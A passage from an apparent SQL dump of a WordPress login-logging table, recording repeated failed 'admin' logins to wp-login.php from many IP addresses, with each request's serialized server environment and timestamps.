Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37500\";s:11:\"REMOTE_ADDR\";s:13:\"185.179.24.14\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744947418.4415939;s:12:\"REQUEST_TIME\";i:1744947418;}}','185.179.24.14',0,'2025-04-18 09:07:00','1970-01-01 00:00:00'),(93751,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54658\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.126.140\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744948698.9911389;s:12:\"REQUEST_TIME\";i:1744948698;}}','198.54.126.140',0,'2025-04-18 09:28:20','1970-01-01 00:00:00'),(93752,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41944\";s:11:\"REMOTE_ADDR\";s:14:\"138.128.162.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744949335.0724211;s:12:\"REQUEST_TIME\";i:1744949335;}}','138.128.162.50',0,'2025-04-18 09:38:56','1970-01-01 00:00:00'),(93753,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45938\";s:11:\"REMOTE_ADDR\";s:15:\"143.110.144.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744949968.129781;s:12:\"REQUEST_TIME\";i:1744949968;}}','143.110.144.210',0,'2025-04-18 09:49:29','1970-01-01 00:00:00'),(93754,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48028\";s:11:\"REMOTE_ADDR\";s:13:\"85.215.220.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744950600.122786;s:12:\"REQUEST_TIME\";i:1744950600;}}','85.215.220.72',0,'2025-04-18 10:00:01','1970-01-01 00:00:00'),(93755,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41700\";s:11:\"REMOTE_ADDR\";s:14:\"78.155.192.110\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744951233.8998089;s:12:\"REQUEST_TIME\";i:1744951233;}}','78.155.192.110',0,'2025-04-18 10:10:35','1970-01-01 00:00:00'),(93756,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36752\";s:11:\"REMOTE_ADDR\";s:15:\"134.122.118.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744951855.8049181;s:12:\"REQUEST_TIME\";i:1744951855;}}','134.122.118.246',0,'2025-04-18 10:20:57','1970-01-01 00:00:00'),(93757,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48292\";s:11:\"REMOTE_ADDR\";s:13:\"37.46.112.100\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744952468.843173;s:12:\"REQUEST_TIME\";i:1744952468;}}','37.46.112.100',0,'2025-04-18 10:31:10','1970-01-01 00:00:00'),(93758,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35856\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.251.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744953102.046972;s:12:\"REQUEST_TIME\";i:1744953102;}}','162.213.251.71',0,'2025-04-18 10:41:43','1970-01-01 00:00:00'),(93759,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45404\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744953740.6283269;s:12:\"REQUEST_TIME\";i:1744953740;}}','66.29.141.17',0,'2025-04-18 10:52:22','1970-01-01 00:00:00'),(93760,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46224\";s:11:\"REMOTE_ADDR\";s:11:\"89.45.83.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744954376.49383;s:12:\"REQUEST_TIME\";i:1744954376;}}','89.45.83.89',0,'2025-04-18 11:02:58','1970-01-01 